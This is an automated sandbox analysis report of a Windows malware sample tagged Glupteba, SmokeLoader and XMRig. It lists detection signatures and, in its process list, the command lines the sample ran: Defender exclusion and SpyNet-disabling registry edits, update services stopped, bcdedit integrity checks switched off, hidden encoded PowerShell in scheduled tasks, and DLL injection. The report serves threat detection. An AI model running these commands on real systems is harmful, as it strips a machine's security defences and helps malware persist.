Malware Analysis Report

2025-01-02 08:08

Sample ID 231006-reg95aee62
Target NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe
SHA256 5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08
Tags
fabookie glupteba smokeloader xmrig pub1 backdoor dropper evasion loader miner spyware stealer trojan upx privateloader themida
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08

Threat Level: Known bad

The file NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe was found to be: Known bad.

Malicious Activity Summary

SmokeLoader

Glupteba

Fabookie

Detect Fabookie payload

UAC bypass

PrivateLoader

xmrig

Windows security bypass

Glupteba payload

Modifies boot configuration data using bcdedit

XMRig Miner payload

Possible attempt to disable PatchGuard

Modifies Windows Firewall

Downloads MZ/PE file

Stops running service(s)

Checks computer location settings

UPX packed file

Windows security modification

Themida packer

Checks whether UAC is enabled

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Launches sc.exe

Enumerates physical storage devices

System policy modification

Runs net.exe

Creates scheduled task(s)

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-10-06 14:06

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-10-06 14:06

Reported

2023-10-06 14:08

Platform

win7-20230831-en

Max time kernel

8s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

Signatures

Detect Fabookie payload

Fabookie

spyware stealer fabookie

Glupteba

loader dropper glupteba

Glupteba payload

SmokeLoader

trojan backdoor smokeloader

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A

Windows security bypass

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A

xmrig

miner xmrig

XMRig Miner payload

miner

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\netsh.exe | N/A
N/A | N/A | C:\Windows\system32\netsh.exe | N/A

Possible attempt to disable PatchGuard

evasion

Stops running service(s)

evasion

UPX packed file

upx

Windows security modification

evasion trojan
Description | Indicator | Process | Target
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe = "0" | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A

Checks whether UAC is enabled

evasion trojan
Description | Indicator | Process | Target
Key value queried | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A

Legitimate hosting services abused for malware hosting/C2

Enumerates physical storage devices

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | N/A
Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2112 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2872 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2112 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2724 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe
PID 2112 wrote to memory of 2660 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2660 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2112 wrote to memory of 2628 | N/A | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

System policy modification

evasion
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe | N/A

Processes

C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe

"C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\NEAS.5cfd37f9531d619fab105eb49fb1cd3c9b38adbaab1cd6f7c546b5189f5a4b08exe_JC.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\EdmGen.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

"C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe"

C:\Users\Admin\Pictures\PTWdf3XUWcjSQWEF4BNvci6u.exe

"C:\Users\Admin\Pictures\PTWdf3XUWcjSQWEF4BNvci6u.exe" --silent --allusers=0

C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe

"C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe"

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

"C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe"

C:\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe

"C:\Users\Admin\Pictures\A42NlvCb1QYQ5lfGTJJCvOAa.exe"

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

"C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe"

C:\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe

"C:\Users\Admin\Pictures\4hwmKH6i0etCyzoS33pO4NxL.exe"

C:\Users\Admin\AppData\Local\Temp\is-B79DS.tmp\is-ETILO.tmp

"C:\Users\Admin\AppData\Local\Temp\is-B79DS.tmp\is-ETILO.tmp" /SL4 $301BE "C:\Users\Admin\Pictures\0FCzfYUr4e3ohZ6BhpSfjsnz.exe" 2846236 52224

C:\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe

"C:\Users\Admin\Pictures\7O8fAU20sqOYQEzFUjAPyRvu.exe"

C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe

"C:\Users\Admin\Pictures\JVCWQstIw44cadV8bJS60RCP.exe"

C:\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe

"C:\Users\Admin\Pictures\70fySZfNza2wnRA4Bb1fJrLA.exe"

C:\Windows\SysWOW64\net.exe

"C:\Windows\system32\net.exe" helpmsg 29

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -i

C:\Windows\SysWOW64\net1.exe

C:\Windows\system32\net1 helpmsg 29

C:\Users\Admin\AppData\Local\Temp\7zSA8DD.tmp\Install.exe

.\Install.exe

C:\Program Files (x86)\OSNMount\OSNMount.exe

"C:\Program Files (x86)\OSNMount\OSNMount.exe" -s

C:\Users\Admin\AppData\Local\Temp\7zSB9DD.tmp\Install.exe

.\Install.exe /DdidCJjeH "385120" /S

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"

C:\Windows\SysWOW64\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32&REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\cmd.exe

/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32&REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /delete /f /tn "GoogleUpdateTaskMachineQC"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "ghLKzPDtB" /SC once /ST 04:37:37 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml"

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "ghLKzPDtB"

C:\Windows\system32\makecab.exe

"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20231006140659.log C:\Windows\Logs\CBS\CbsPersist_20231006140659.cab

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Program Files\Google\Chrome\updater.exe

"C:\Program Files\Google\Chrome\updater.exe"

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /run /tn "GoogleUpdateTaskMachineQC"

C:\Windows\system32\taskeng.exe

taskeng.exe {2AFA7E24-E487-4520-ABA3-138F3DAD67B2} S-1-5-21-86725733-3001458681-3405935542-1000:ZWKQHIWB\Admin:Interactive:[1]

\??\c:\windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32

C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe

"C:\Users\Admin\Pictures\UFZIn4vmh6DMjXcbkoqqcvoL.exe"

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe

"C:\Users\Admin\Pictures\Eb0NwM2OQwy8SrSKS3OW09gK.exe"

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\rss\csrss.exe

C:\Windows\rss\csrss.exe

C:\Windows\system32\cmd.exe

C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Windows\system32\netsh.exe

netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\system32\schtasks.exe

schtasks /delete /tn ScheduledUpdate /f

C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe

"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe

C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll

C:\Windows\System32\sc.exe

sc stop dosvc

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-ac 0

C:\Windows\System32\powercfg.exe

powercfg /x -hibernate-timeout-dc 0

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-dc 0

C:\Windows\System32\conhost.exe

C:\Windows\System32\conhost.exe

C:\Windows\System32\powercfg.exe

powercfg /x -standby-timeout-ac 0

C:\Windows\explorer.exe

C:\Windows\explorer.exe

C:\Windows\System32\schtasks.exe

C:\Windows\System32\schtasks.exe /create /f /ru "System" /tn "GoogleUpdateTaskMachineQC" /xml "C:\Windows\TEMP\xyvvnnvseiqa.xml"

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0

C:\Windows\System32\sc.exe

sc stop bits

C:\Windows\System32\sc.exe

sc stop wuauserv

C:\Windows\System32\sc.exe

sc stop WaaSMedicSvc

C:\Windows\System32\sc.exe

sc stop UsoSvc

C:\Windows\System32\cmd.exe

C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "ghLKzPDtB"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "bAutabDQFHrvmwrWbf" /SC once /ST 14:08:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\mgmyLlQChgHxZYvqY\rqBhQmxZHCWBdIf\aEedQxU.exe\" F9 /Yosite_idpIV 385120 /S" /V1 /F

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -timeout 0

C:\Windows\system32\bcdedit.exe

C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}

C:\Windows\system32\bcdedit.exe

C:\Windows\Sysnative\bcdedit.exe /v

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe

C:\Windows\system32\schtasks.exe

schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F

C:\Windows\windefender.exe

"C:\Windows\windefender.exe"

C:\Windows\SysWOW64\cmd.exe

cmd.exe /C sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\SysWOW64\sc.exe

sc sdset WinDefender D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPLOCRSDRCWDWO;;;BA)(D;;WPDT;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)

C:\Windows\windefender.exe

C:\Windows\windefender.exe

C:\Windows\system32\taskeng.exe

taskeng.exe {D21939EB-D0FB-4F65-8521-0FDB9007B582} S-1-5-18:NT AUTHORITY\System:Service:

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

C:\Users\Admin\AppData\Local\Temp\csrss\f801950a962ddba14caaa44bf084b55c.exe

